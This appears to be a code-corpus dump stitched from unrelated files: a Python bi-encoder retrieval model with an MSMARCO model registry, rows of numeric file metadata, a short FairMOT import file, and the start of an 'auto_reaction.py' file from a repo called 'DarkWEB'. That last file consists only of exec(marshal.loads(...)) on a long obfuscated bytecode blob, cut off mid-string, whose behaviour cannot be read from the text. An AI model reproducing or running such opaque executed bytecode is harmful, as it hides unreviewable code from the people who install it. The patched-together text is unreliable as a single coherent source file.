        # Same missing-attribute guard as in from_pretrained (see BUG FIX above).
        encode_proj = getattr(self, 'encode_proj', None)
        if encode_proj:
            return encode_proj.out_features
        return 768
class BiEncoderFast(nn.Module):
    """Bi-encoder: independent query and context/passage towers.

    In training mode (a positive and a negative passage supplied) it returns
    the mean NLL of ranking the positive above the negative; in inference
    mode (no negative) it returns the raw embeddings.
    """

    def __init__(self, args):
        super(BiEncoderFast, self).__init__()
        self.question_model = RobertaEncoderFast()
        self.ctx_model = RobertaEncoderFast()

    def query_emb(self, input_ids, attention_mask=None):
        # Pooled (first-token) representation from the question tower.
        _, pooled, _ = self.question_model(input_ids)
        return pooled

    def body_emb(self, input_ids, attention_mask=None):
        # Pooled representation from the context tower.
        _, pooled, _ = self.ctx_model(input_ids)
        return pooled

    def forward(self, query_ids, attention_mask_q=None, input_ids_a=None, attention_mask_a=None, input_ids_b=None, attention_mask_b=None):
        q_embs = self.query_emb(query_ids, attention_mask_q)
        a_embs = self.body_emb(input_ids_a, attention_mask_a)
        if input_ids_b is None:
            # Inference path: hand back embeddings for external scoring.
            return (q_embs, a_embs)
        b_embs = self.body_emb(input_ids_b, attention_mask_b)
        pos_scores = (q_embs * a_embs).sum(-1).unsqueeze(1)
        neg_scores = (q_embs * b_embs).sum(-1).unsqueeze(1)
        logit_matrix = torch.cat([pos_scores, neg_scores], dim=1)  # [B, 2]
        lsm = F.log_softmax(logit_matrix, dim=1)
        # NLL of the positive passage (column 0).
        loss = -1.0 * lsm[:, 0]
        return (loss.mean(),)
# --------------------------------------------------
# Flatten the pretrained shortcut names of every supported config class.
# Older transformers releases expose them via pretrained_config_archive_map;
# the hasattr guard keeps this working when the attribute is gone.
ALL_MODELS = ()
for _conf in (RobertaConfig,):
    if hasattr(_conf, 'pretrained_config_archive_map'):
        ALL_MODELS += tuple(_conf.pretrained_config_archive_map.keys())

default_process_fn = triple_process_fn
class MSMarcoConfig:
    """Bundle of everything needed to build one MSMARCO model variant:
    a registry name, the model class, its tokenizer/config classes, the
    batch-processing function, and whether mean pooling is used.
    """

    def __init__(self, name, model, process_fn=default_process_fn, use_mean=True, tokenizer_class=RobertaTokenizer, config_class=RobertaConfig):
        self.name = name
        self.model_class = model  # stored under a different attribute name than the parameter
        self.tokenizer_class = tokenizer_class
        self.config_class = config_class
        self.process_fn = process_fn
        self.use_mean = use_mean
# Registry of model variants as (name, model class, tokenizer override,
# config override); None overrides fall back to MSMarcoConfig's RoBERTa
# defaults. Every variant uses first-token pooling (use_mean=False).
_MODEL_SPECS = [
    ("rdot_nll", RobertaDot_NLL_LN, None, None),
    ("rdot_nll_multi_chunk", RobertaDot_CLF_ANN_NLL_MultiChunk, None, None),
    ("dpr", BiEncoder, BertTokenizer, BertConfig),
    ("dpr_fast", BiEncoderFast, None, None),
    ("ELECTRA_Dot_NLL_LN", ELECTRA_Dot_NLL_LN, ElectraTokenizer, ElectraConfig),
    ("ERNIE2Dot_NLL_LN", ERNIE2Dot_NLL_LN, BertTokenizer, BertConfig),
    ("rdot_nll_fairseq", RobertaDot_NLL_LN_fairseq, None, None),
    ("rdot_nll_fairseq_fast", RobertaDot_NLL_LN_fairseq_fast, None, None),
    ("rdot_nll_fairseq_fast_sentence", RobertaDot_NLL_LN_fairseq_fast_sentence, None, None),
    ("rdot_nll_fairseq_fast_3layer", RobertaDot_NLL_LN_fairseq_fast_3layer, None, None),
    ("rdot_nll_fairseq_fast2", RobertaDot_NLL_LN_fairseq_fast2, None, None),
    ("rdot_nll_fairseq_fast_zero", RobertaDot_NLL_LN_fairseq_fast_zero, None, None),
    ("rdot_nll_fairseq_fast_concat", RobertaDot_NLL_LN_fairseq_fast_concat, None, None),
    ("rdot_nll_multi_chunk_fairseq_fast", RobertaDot_CLF_ANN_NLL_MultiChunk_fairseq_fast, None, None),
]

configs = [
    MSMarcoConfig(
        name=_name,
        model=_model,
        use_mean=False,
        **({} if _tok is None else {"tokenizer_class": _tok, "config_class": _cfg}),
    )
    for _name, _model, _tok, _cfg in _MODEL_SPECS
]

# Name -> config lookup used by the training/inference entry points.
MSMarcoConfigDict = {cfg.name: cfg for cfg in configs}
| 41.10815
| 147
| 0.581062
| 6,148
| 52,454
| 4.646552
| 0.057417
| 0.052788
| 0.035846
| 0.033815
| 0.849547
| 0.822347
| 0.798404
| 0.769629
| 0.758638
| 0.750201
| 0
| 0.019615
| 0.308956
| 52,454
| 1,275
| 148
| 41.140392
| 0.768484
| 0.215179
| 0
| 0.718259
| 0
| 0.007255
| 0.02661
| 0.006113
| 0
| 0
| 0
| 0
| 0.021765
| 1
| 0.082225
| false
| 0
| 0.015719
| 0.013301
| 0.183797
| 0.025393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34052907947a5431f48239e16ec45820a06bc441
| 65
|
py
|
Python
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 3,473
|
2020-04-04T08:04:33.000Z
|
2022-03-31T14:52:11.000Z
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 472
|
2020-04-07T15:33:15.000Z
|
2022-03-31T02:31:10.000Z
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 914
|
2020-04-08T00:37:45.000Z
|
2022-03-31T08:43:39.000Z
|
from .default import _C as cfg
from .default import update_config
| 32.5
| 34
| 0.830769
| 11
| 65
| 4.727273
| 0.727273
| 0.423077
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138462
| 65
| 2
| 34
| 32.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
34075218c5330edc658d287d76afddd921c59763
| 49,431
|
py
|
Python
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
"Apache-2.0"
] | 199
|
2018-06-21T22:23:28.000Z
|
2022-03-14T09:55:12.000Z
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
"Apache-2.0"
] | 6
|
2018-07-28T02:54:47.000Z
|
2021-12-01T19:35:31.000Z
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
"Apache-2.0"
] | 148
|
2018-06-06T06:51:18.000Z
|
2022-03-24T00:03:19.000Z
|
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xf2\x1a\x00\x00d\x00\x00Z\x00\x00d\x01\x00d\x02\x00\x17d\x03\x00\x17d\x04\x00\x17d\x05\x00\x17d\x06\x00\x17d\x07\x00\x17d\x08\x00\x17d\t\x00\x17d\n\x00\x17d\x0b\x00\x17d\x07\x00\x17d\x0c\x00\x17d\r\x00\x17d\x0e\x00\x17d\x0f\x00\x17d\x10\x00\x17d\x11\x00\x17d\x12\x00\x17d\x13\x00\x17d\t\x00\x17d\x14\x00\x17d\x15\x00\x17d\x16\x00\x17d\x17\x00\x17d\x18\x00\x17d\x19\x00\x17d\x1a\x00\x17d\x1b\x00\x17d\x1c\x00\x17d\x1d\x00\x17d\x1e\x00\x17d\x1f\x00\x17d \x00\x17d!\x00\x17d"\x00\x17d#\x00\x17d$\x00\x17d%\x00\x17d&\x00\x17d\'\x00\x17d(\x00\x17d)\x00\x17d*\x00\x17d+\x00\x17d(\x00\x17d,\x00\x17d-\x00\x17d.\x00\x17d/\x00\x17d0\x00\x17d1\x00\x17d2\x00\x17d3\x00\x17d4\x00\x17d5\x00\x17d5\x00\x17d6\x00\x17d7\x00\x17d8\x00\x17d9\x00\x17d:\x00\x17d;\x00\x17d<\x00\x17d=\x00\x17d>\x00\x17d?\x00\x17d@\x00\x17dA\x00\x17dB\x00\x17dC\x00\x17dD\x00\x17dE\x00\x17dF\x00\x17dG\x00\x17dH\x00\x17dI\x00\x17dJ\x00\x17dK\x00\x17dL\x00\x17dM\x00\x17dN\x00\x17dO\x00\x17dP\x00\x17dQ\x00\x17dR\x00\x17dS\x00\x17dT\x00\x17dU\x00\x17dV\x00\x17dW\x00\x17dX\x00\x17dY\x00\x17dZ\x00\x17d[\x00\x17d\\\x00\x17d]\x00\x17d^\x00\x17d_\x00\x17d`\x00\x17da\x00\x17db\x00\x17dc\x00\x17dd\x00\x17de\x00\x17df\x00\x17dg\x00\x17dh\x00\x17di\x00\x17dj\x00\x17dk\x00\x17dl\x00\x17dm\x00\x17dn\x00\x17do\x00\x17dp\x00\x17dq\x00\x17dr\x00\x17ds\x00\x17dt\x00\x17du\x00\x17dv\x00\x17dw\x00\x17dx\x00\x17dy\x00\x17dz\x00\x17d{\x00\x17d|\x00\x17d}\x00\x17d~\x00\x17d\x7f\x00\x17d\x80\x00\x17d\x81\x00\x17d\x82\x00\x17d\x83\x00\x17d\x84\x00\x17d\x7f\x00\x17d\x80\x00\x17d\x81\x00\x17d\x85\x00\x17d\x86\x00\x17d\x87\x00\x17d\x88\x00\x17d\x89\x00\x17d\x8a\x00\x17d\x8b\x00\x17d\x8c\x00\x17d\x87\x00\x17d\x88\x00\x17d\x89\x00\x17d\x8a\x00\x17d\x8d\x00\x17d\x8e\x00\x17d\x8f\x00\x17d\x90\x00\x17d\x91\x00\x17d\x92\x00\x17d\x93\x00\x17d\x94\x00\x17d\x95\x00\x17d\x96\x00\x17d\x97\x00\x17d\x98\x00\x17d\x99\x00\x17d\x9a\x00\x17d\x9b\x00\x17d\x9c\x00\x17d\x9d\x00\x
17d\x9e\x00\x17d\x9f\x00\x17d\xa0\x00\x17d\xa1\x00\x17d\xa2\x00\x17d\xa3\x00\x17d\xa4\x00\x17d\xa5\x00\x17d\xa6\x00\x17d\xa7\x00\x17d\xa8\x00\x17d\xa9\x00\x17d\xaa\x00\x17d\xab\x00\x17d\xac\x00\x17d\xad\x00\x17dX\x00\x17d\xae\x00\x17d\xaf\x00\x17d\xb0\x00\x17d\xb1\x00\x17d\xb2\x00\x17d\xb3\x00\x17d\xb4\x00\x17d\xb5\x00\x17d\xb6\x00\x17d\xb7\x00\x17d\xb8\x00\x17d\xb9\x00\x17d\xba\x00\x17d\xbb\x00\x17d\xbc\x00\x17d\xbd\x00\x17d\xbe\x00\x17d\xbf\x00\x17d\xc0\x00\x17d\xc1\x00\x17d\xc2\x00\x17d\xc3\x00\x17d\xc4\x00\x17d\x90\x00\x17d\xc5\x00\x17d\xc6\x00\x17d\xc7\x00\x17d\xc8\x00\x17d\xc9\x00\x17d\xca\x00\x17d\xcb\x00\x17d\xcc\x00\x17d\xcd\x00\x17d\xce\x00\x17d\xcf\x00\x17d\xd0\x00\x17d\xd1\x00\x17d\xd2\x00\x17d\xd3\x00\x17d\xd4\x00\x17d\xd5\x00\x17d\xd6\x00\x17d\xd7\x00\x17d\xd8\x00\x17d\xd9\x00\x17d\xda\x00\x17d\xdb\x00\x17d\xdc\x00\x17d\xdd\x00\x17d\xde\x00\x17d\xdf\x00\x17d\xe0\x00\x17d\xe1\x00\x17d\xe2\x00\x17d\xe3\x00\x17d\xe4\x00\x17d\xe5\x00\x17d\xe6\x00\x17d\xbd\x00\x17d\xe7\x00\x17d\xe8\x00\x17d\xe9\x00\x17d\xea\x00\x17d\xeb\x00\x17d\xec\x00\x17d\xed\x00\x17d\xee\x00\x17d\xef\x00\x17d\xf0\x00\x17d\xf1\x00\x17d\xf2\x00\x17d\xf3\x00\x17d\xf4\x00\x17d\xf5\x00\x17d\xf6\x00\x17d\xf7\x00\x17d\xf8\x00\x17d\xf9\x00\x17d\x90\x00\x17d\xc5\x00\x17d\xc6\x00\x17d\xc7\x00\x17d\xfa\x00\x17d\xfb\x00\x17d\xfc\x00\x17d\xfa\x00\x17d\xfd\x00\x17d\xfe\x00\x17d\xff\x00\x17d\x00\x01\x17d\x01\x01\x17d\x02\x01\x17d\x03\x01\x17d\xdc\x00\x17d\x04\x01\x17d\x05\x01\x17d\x06\x01\x17d\x07\x01\x17d\x08\x01\x17d\xf3\x00\x17d\t\x01\x17d\n\x01\x17d\x0b\x01\x17d\x0c\x01\x17d\r\x01\x17d\x0e\x01\x17d\x0f\x01\x17d\x10\x01\x17d\x11\x01\x17d\x12\x01\x17d\x13\x01\x17d\x14\x01\x17d\x15\x01\x17d\x16\x01\x17d\x17\x01\x17d\x18\x01\x17d\x19\x01\x17d\x1a\x01\x17d\x1b\x01\x17d\x1c\x01\x17d\x1d\x01\x17d\x1e\x01\x17d\x7f\x00\x17d\x1f\x01\x17d 
\x01\x17d!\x01\x17d"\x01\x17d\x7f\x00\x17d#\x01\x17d$\x01\x17d%\x01\x17d&\x01\x17d\'\x01\x17d(\x01\x17d)\x01\x17d*\x01\x17d+\x01\x17dG\x00\x17d\xe2\x00\x17d,\x01\x17d-\x01\x17d.\x01\x17d\x07\x01\x17d\x08\x01\x17d\xf3\x00\x17d\t\x01\x17d\n\x01\x17d/\x01\x17d0\x01\x17d1\x01\x17d2\x01\x17d3\x01\x17d4\x01\x17d\x14\x01\x17d\x15\x01\x17d\x16\x01\x17d5\x01\x17d\x18\x01\x17d\x19\x01\x17d6\x01\x17d7\x01\x17d\x0e\x01\x17d8\x01\x17d9\x01\x17d:\x01\x17d;\x01\x17d<\x01\x17d=\x01\x17d>\x01\x17d?\x01\x17d@\x01\x17dA\x01\x17dB\x01\x17dC\x01\x17dD\x01\x17dE\x01\x17dF\x01\x17dG\x01\x17dH\x01\x17d\xe6\x00\x17d\xbd\x00\x17d\xe7\x00\x17dI\x01\x17dJ\x01\x17dK\x01\x17dL\x01\x17dM\x01\x17dN\x01\x17dO\x01\x17dP\x01\x17dQ\x01\x17dR\x01\x17dS\x01\x17dT\x01\x17dU\x01\x17dV\x01\x17dW\x01\x17dX\x01\x17dD\x01\x17dY\x01\x17dZ\x01\x17d[\x01\x17d\\\x01\x17d]\x01\x17d^\x01\x17d_\x01\x17d`\x01\x17dT\x00\x17da\x01\x17db\x01\x17d\xb1\x00\x17dc\x01\x17dd\x01\x17de\x01\x17df\x01\x17dg\x01\x17dh\x01\x17di\x01\x17dj\x01\x17dk\x01\x17dl\x01\x17dm\x01\x17dn\x01\x17do\x01\x17d\xbd\x00\x17dp\x01\x17dq\x01\x17dr\x01\x17ds\x01\x17dt\x01\x17du\x01\x17dv\x01\x17dw\x01\x17d\xfd\x00\x17d\xfe\x00\x17d\xff\x00\x17d\x00\x01\x17d\x01\x01\x17dx\x01\x17dy\x01\x17dz\x01\x17d{\x01\x17d|\x01\x17d}\x01\x17d~\x01\x17d\x7f\x01\x17d\x80\x01\x17d\x81\x01\x17d\x82\x01\x17d\x83\x01\x17d\x84\x01\x17d\x85\x01\x17d\x86\x01\x17d\x87\x01\x17d\x88\x01\x17d\x89\x01\x17d\x8a\x01\x17d\x8b\x01\x17d\x8c\x01\x17d\x8d\x01\x17d\x8e\x01\x17d\x8f\x01\x17d\x90\x01\x17d\x91\x01\x17d\x92\x01\x17d\x93\x01\x17d\x94\x01\x17d\x95\x01\x17d\x96\x01\x17d\x97\x01\x17d\x98\x01\x17d\x99\x01\x17d\x9a\x01\x17d\x9b\x01\x17d\x9c\x01\x17d\x9d\x01\x17d\x9e\x01\x17do\x01\x17d\xb9\x00\x17d\x9f\x01\x17d\xa0\x01\x17d\xa1\x01\x17d\xa2\x01\x17d\xa3\x01\x17d\xa4\x01\x17d\xa5\x01\x17d\x16\x00\x17d\xa6\x01\x17d\xa7\x01\x17d\xa8\x01\x17d\xa9\x01\x17d\xaa\x01\x17d\x7f\x00\x17d\xab\x01\x17d\xac\x01\x17ds\x00\x17d&\x01\x17d\'\x01\x17d(\x01\x17d)\x01\x17d*\x01\x17d\x7f\x00\x17d\x1
f\x01\x17d \x01\x17d!\x01\x17d"\x01\x17d\xfb\x00\x17d\xfc\x00\x17d\x94\x00\x17d\xad\x01\x17d\xae\x01\x17d\xaf\x01\x17d\xb0\x01\x17d\xb1\x01\x17d\xb2\x01\x17d\xb3\x01\x17d\xb4\x01\x17d\xb5\x01\x17d\xb6\x01\x17d\xb7\x01\x17d\xb8\x01\x17d\xb9\x01\x17d\xba\x01\x17d\xbb\x01\x17d\xbc\x01\x17d\xbd\x01\x17d\xbe\x01\x17d\xbf\x01\x17d\xe7\x00\x17d\xc0\x01\x17d\xc1\x01\x17d\xc2\x01\x17d\xc3\x01\x17d\xc4\x01\x17d\x7f\x00\x17d\x1f\x01\x17d \x01\x17d!\x01\x17d"\x01\x17d\xc5\x01\x17d\xc6\x01\x17d\xc7\x01\x17d\xc8\x01\x17d%\x01\x17d\xc9\x01\x17d\xca\x01\x17d%\x01\x17d&\x01\x17d\'\x01\x17d(\x01\x17d)\x01\x17d*\x01\x17dH\x01\x17d\xe6\x00\x17d\xbd\x00\x17d\xbe\x00\x17d\xcb\x01\x17d\xcc\x01\x17d\xcd\x01\x17d\xce\x01\x17d\x87\x01\x17d\xcf\x01\x17d\xd0\x01\x17d\xd1\x01\x17d\xc2\x01\x17d\xd2\x01\x17d\xd3\x01\x17d\xd4\x01\x17d\xef\x00\x17d\xd5\x01\x17d\xd6\x01\x17d[\x01\x17d\xd7\x01\x17d\xd8\x01\x17d\xd9\x01\x17dU\x01\x17d\xda\x01\x17d\xdb\x01\x17d\xdc\x01\x17d\xdd\x01\x17d\xde\x01\x17d\xdf\x01\x17d\xe0\x01\x17d\xe1\x01\x17d\xe2\x01\x17d\xe3\x01\x17d\xe4\x01\x17d~\x01\x17da\x01\x17d\xe5\x01\x17d\xe6\x01\x17d\xe7\x01\x17d\xe8\x01\x17d\xe9\x01\x17d\xea\x01\x17d\xeb\x01\x17d\xec\x01\x17d\xed\x01\x17d\xee\x01\x17d\xef\x01\x17d\xf0\x01\x17d\xf1\x01\x17d\xf2\x01\x17d\xf3\x01\x17d%\x00\x17d\xf4\x01\x17d\xf5\x01\x17d\xf6\x01\x17d\xf7\x01\x17d\xf8\x01\x17d\xf9\x01\x17d\xfa\x01\x17d\xfb\x01\x17d\xfc\x01\x17d\xf5\x01\x17d\xfd\x01\x17d\xfe\x01\x17d\xff\x01\x17d\x00\x02\x17d\xf5\x01\x17d\x01\x02\x17d\x02\x02\x17d\x03\x02\x17d\x04\x02\x17d\x05\x02\x17d\x06\x02\x17d\x07\x02\x17d;\x00\x17d\x08\x02\x17d\t\x02\x17d\n\x02\x17d\x0b\x02\x17d\x0c\x02\x17d\r\x02\x17d\x0e\x02\x17d\x0f\x02\x17d\x10\x02\x17d<\x00\x17d<\x00\x17d\x11\x02\x17d\x12\x02\x17d\x13\x02\x17d\x14\x02\x17d\x15\x02\x17d5\x00\x17d4\x00\x17d\xf3\x01\x17d4\x00\x17d\x03\x02\x17d\x16\x02\x17d\x17\x02\x17d\x18\x02\x17d\x19\x02\x17d=\x00\x17d\x1a\x02\x17d\x1b\x02\x17d\xea\x01\x17d\x1c\x02\x17d\x1d\x02\x17d\x1e\x02\x17d\x1f\x02\x17d\xea\x01\x17d\xeb\x
01\x17d\x01\x02\x17d\xec\x01\x17d\x14\x02\x17d \x02\x17d!\x02\x17d"\x02\x17d\xff\x01\x17d\x12\x02\x17d#\x02\x17d$\x02\x17d%\x02\x17d\x0f\x02\x17d&\x02\x17d\x04\x02\x17d\'\x02\x17d:\x00\x17d(\x02\x17d:\x00\x17d)\x02\x17d\x0e\x02\x17d*\x02\x17d5\x00\x17d+\x02\x17d:\x00\x17d,\x02\x17d-\x02\x17d\xf0\x01\x17d.\x02\x17d/\x02\x17d0\x02\x17d1\x02\x17d2\x02\x17d\x12\x02\x17d\x13\x02\x17d\x14\x02\x17d\x15\x02\x17d5\x00\x17d\xf1\x01\x17d3\x02\x17d4\x02\x17d5\x02\x17d6\x02\x17d7\x02\x17d8\x02\x17d9\x02\x17d\xf2\x01\x17d:\x02\x17d\x17\x02\x17d;\x02\x17d<\x02\x17d=\x02\x17d\xec\x01\x17d\x14\x02\x17d>\x02\x17d\x15\x02\x17d.\x02\x17d5\x00\x17d?\x02\x17d@\x02\x17d\x04\x02\x17d4\x02\x17dA\x02\x17dB\x02\x17d\x0e\x02\x17dC\x02\x17d\xf2\x01\x17d\xf1\x01\x17d4\x00\x17d\xfe\x01\x17d\xff\x01\x17d\x00\x02\x17dD\x02\x17dE\x02\x17d\r\x02\x17dE\x02\x17d<\x02\x17d=\x02\x17dF\x02\x17dG\x02\x17d\xf7\x01\x17d\xf2\x01\x17d3\x00\x17dH\x02\x17dI\x02\x17dJ\x02\x17dK\x02\x17dL\x02\x17dM\x02\x17d3\x02\x17dN\x02\x17dO\x02\x17d\x08\x02\x17dP\x02\x17d\x0c\x02\x17dQ\x02\x17d\x0b\x02\x17dR\x02\x17d\xef\x01\x17d\x14\x02\x17d\x0f\x02\x17dS\x02\x17d\x12\x02\x17d\x13\x02\x17d\x14\x02\x17d\x15\x02\x17d?\x02\x17dT\x02\x17dU\x02\x17d\x0b\x02\x17dV\x02\x17d\xea\x01\x17dW\x02\x17d\xeb\x01\x17dX\x02\x17dY\x02\x17dF\x02\x17dZ\x02\x17d\xf9\x01\x17d3\x00\x17d\xf3\x01\x17d[\x02\x17d\\\x02\x17d]\x02\x17d\x14\x02\x17d^\x02\x17d\xee\x01\x17dM\x02\x17dG\x02\x17d\xf7\x01\x17d\xf2\x01\x17d_\x02\x17d`\x02\x17da\x02\x17d\x08\x02\x17db\x02\x17d\x13\x02\x17d\x14\x02\x17d\x15\x02\x17d\xf3\x01\x17d.\x02\x17d\xf8\x01\x17dc\x02\x17d5\x00\x17dd\x02\x17de\x02\x17d8\x02\x17df\x02\x17d.\x02\x17dG\x02\x17d+\x02\x17dg\x02\x17dh\x02\x17d\xed\x01\x17d^\x02\x17dY\x02\x17di\x02\x17d_\x02\x17d5\x02\x17dj\x02\x17da\x02\x17dk\x02\x17d\x0b\x02\x17dE\x02\x17dl\x02\x17d\x0b\x02\x17dm\x02\x17d^\x02\x17d\x14\x02\x17dn\x02\x17d\x02\x02\x17do\x02\x17dp\x02\x17dq\x02\x17dO\x02\x17d:\x00\x17d=\x00\x17dr\x02\x17d\x13\x02\x17d\x14\x02\x17d\x15\x02\x17d\xf7\x0
1\x17do\x02\x17d4\x00\x17d\xf8\x01\x17dH\x02\x17ds\x02\x17d\x06\x02\x17dt\x02\x17du\x02\x17dv\x02\x17d\xea\x01\x17d\n\x02\x17dh\x02\x17d\xed\x01\x17d\xfd\x01\x17d\xfe\x01\x17d\xff\x01\x17d\x00\x02\x17d\xf5\x01\x17d\x01\x02\x17d\x02\x02\x17d\x03\x02\x17d\x04\x02\x17d\x05\x02\x17d\x06\x02\x17d\x07\x02\x17d;\x00\x17d\x08\x02\x17d\t\x02\x17d\n\x02\x17d\x0b\x02\x17d\x0c\x02\x17d\r\x02\x17d\x0e\x02\x17d\x0f\x02\x17d\x10\x02\x17d<\x00\x17d<\x00\x17d\x11\x02\x17dw\x02\x17dx\x02\x17dy\x02\x17dz\x02\x17d{\x02\x17d\x03\x01\x17d|\x02\x17d}\x02\x17d~\x02\x17d\x7f\x02\x17d\x80\x02\x17d\x81\x02\x17d\xd6\x01\x17d\x82\x02\x17d\x83\x02\x17dO\x01\x17d\x84\x02\x17d\x85\x02\x17d\x86\x02\x17d\x87\x02\x17d\x88\x02\x17dO\x01\x17d\x89\x02\x17d\x8a\x02\x17d\x87\x02\x17d\x88\x02\x17dO\x01\x17d\x8b\x02\x17d\x8c\x02\x17d\x8d\x02\x17d\x8e\x02\x17d\x8f\x02\x17d\x90\x02\x17d\x91\x02\x17d\x92\x02\x17d\x93\x02\x17d\x94\x02\x17d\x95\x02\x17d\x96\x02\x17d\x97\x02\x17d\x98\x02\x17d\x99\x02\x17d\x9a\x02\x17d\x9b\x02\x17d\x9c\x02\x17d\x9d\x02\x17d\x9e\x02\x17d\x9f\x02\x17d\xa0\x02\x17d\xa1\x02\x17d\xa2\x02\x17d\xa3\x02\x17d\xa4\x02\x17d\xa5\x02\x17d\xa3\x02\x17d\xa4\x02\x17d\xa6\x02\x17d\x9c\x02\x17d\x9d\x02\x17d\xa7\x02\x17d\xa8\x02\x17d\xa9\x02\x17d\xaa\x02\x17d\xab\x02\x17d\xac\x02\x17d\xad\x02\x17d\xae\x02\x17d\x9f\x02\x17d\xa9\x02\x17d\xaa\x02\x17d\xaf\x02\x17d\xac\x02\x17d\xad\x02\x17d\xb0\x02\x17d\xb1\x02\x17d\xb2\x02\x17d\xb3\x02\x17d\xb4\x02\x17d\xb5\x02\x17d\xb6\x02\x17d\xb7\x02\x17d\xb8\x02\x17d\xb9\x02\x17d\xba\x02\x17d\xbb\x02\x17dG\x00\x17d\xbc\x02\x17d\xbd\x02\x17d\xbe\x02\x17d\xbf\x02\x17d\xe5\x00\x17d\xc0\x02\x17d\x90\x01\x17d\x91\x01\x17d\xc1\x02\x17d\xc2\x02\x17d\xc3\x02\x17d\xc4\x02\x17d\xc5\x02\x17d\xc6\x02\x17d\xc7\x02\x17d\xc8\x02\x17d\xc9\x02\x17d\xca\x02\x17d\x87\x02\x17d\x88\x02\x17dO\x01\x17d\x8b\x02\x17d\xcb\x02\x17d\xcc\x02\x17d\xba\x01\x17d\xcd\x02\x17d\xce\x02\x17d\xcf\x02\x17d\xd0\x02\x17d\xd1\x02\x17d\xd2\x02\x17d\xd3\x02\x17d\xd4\x02\x17d\xd5\x02\x17d\xd6\x02\x17d\xd7\x0
2\x17d\xd8\x02\x17d\xd9\x02\x17d\xbe\x02\x17d\xda\x02\x17d\xdb\x02\x17d\xe5\x00\x17d\xe6\x00\x17d\xdc\x02\x17d\xdd\x02\x17d\xde\x02\x17d\xdf\x02\x17d\xe0\x02\x17d\xe1\x02\x17d\xe2\x02\x17d\xe3\x02\x17df\x01\x17d\xe4\x02\x17d\xe5\x02\x17d\xe6\x02\x17d\xe7\x02\x17d\xe8\x02\x17d\xe9\x02\x17d\xea\x02\x17d\xeb\x02\x17d\xec\x02\x17d\xed\x02\x17d\xee\x02\x17d\xef\x02\x17d\xf0\x02\x17d\xf1\x02\x17d\xf2\x02\x17d\xf3\x02\x17d\xf4\x02\x17d\x1c\x01\x17d\xec\x02\x17d\xf5\x02\x17d\xf6\x02\x17d\xf7\x02\x17d\xf8\x02\x17dY\x01\x17d\xf9\x02\x17d\xfa\x02\x17d\xfb\x02\x17d\xfc\x02\x17d\xfd\x02\x17d\xfe\x02\x17d\xff\x02\x17d\x00\x03\x17d\x01\x03\x17d\x02\x03\x17d\x03\x03\x17d\x04\x03\x17d\xb1\x01\x17d\x05\x03\x17d\x06\x03\x17d\x07\x03\x17d\x08\x03\x17d\t\x03\x17d\n\x03\x17d\x0b\x03\x17d\x0c\x03\x17d\xf6\x00\x17d\x1c\x01\x17d\r\x03\x17d\x0e\x03\x17d\x0f\x03\x17d\x10\x03\x17d\x11\x03\x17d\x12\x03\x17d\x13\x03\x17d\x14\x03\x17d\x15\x03\x17d\x16\x03\x17d\t\x03\x17d\n\x03\x17d\x17\x03\x17d\x06\x01\x17d\x18\x03\x17d\x19\x03\x17d\x1a\x03\x17d\x1b\x03\x17d\x1c\x03\x17d\x1d\x03\x17d\x1e\x03\x17d\x1f\x03\x17d 
\x03\x17d!\x03\x17d"\x03\x17d#\x03\x17d$\x03\x17d%\x03\x17d\xfa\x00\x17d&\x03\x17d\'\x03\x17d(\x03\x17d\xfa\x00\x17d)\x03\x17d*\x03\x17d+\x03\x17d,\x03\x17d-\x03\x17d.\x03\x17d\t\x03\x17d/\x03\x17d\xb5\x01\x17d0\x03\x17d1\x03\x17d2\x03\x17d3\x03\x17d\x9d\x02\x17d4\x03\x17d5\x03\x17d6\x03\x17d7\x03\x17d8\x03\x17d\x06\x01\x17d\x7f\x00\x17d\xab\x01\x17d9\x03\x17d:\x03\x17d;\x03\x17d<\x03\x17d\xad\x01\x17d\xae\x01\x17d\xaf\x01\x17d\xb0\x01\x17d\xb1\x01\x17d\x06\x01\x17d=\x03\x17d>\x03\x17d\xe6\x00\x17d\xbd\x00\x17d?\x03\x17d@\x03\x17dA\x03\x17dA\x01\x17dB\x03\x17dC\x03\x17dD\x03\x17d\x7f\x00\x17d\xab\x01\x17d\xac\x01\x17dE\x03\x17d\xad\x01\x17d\xae\x01\x17d\xaf\x01\x17d\xb0\x01\x17d\xb1\x01\x17dF\x03\x17dG\x03\x17dH\x03\x17dI\x03\x17dJ\x03\x17dK\x03\x17dL\x03\x17dM\x03\x17dN\x03\x17dO\x03\x17dP\x03\x17dQ\x03\x17d\xab\x01\x17dR\x03\x17dS\x03\x17dT\x03\x17dU\x03\x17dV\x03\x17dW\x03\x17dX\x03\x17dM\x01\x17d\x9d\x01\x17d\x8f\x01\x17dg\x01\x17dY\x03\x17dZ\x03\x17d[\x03\x17d\\\x03\x17d]\x03\x17d^\x03\x1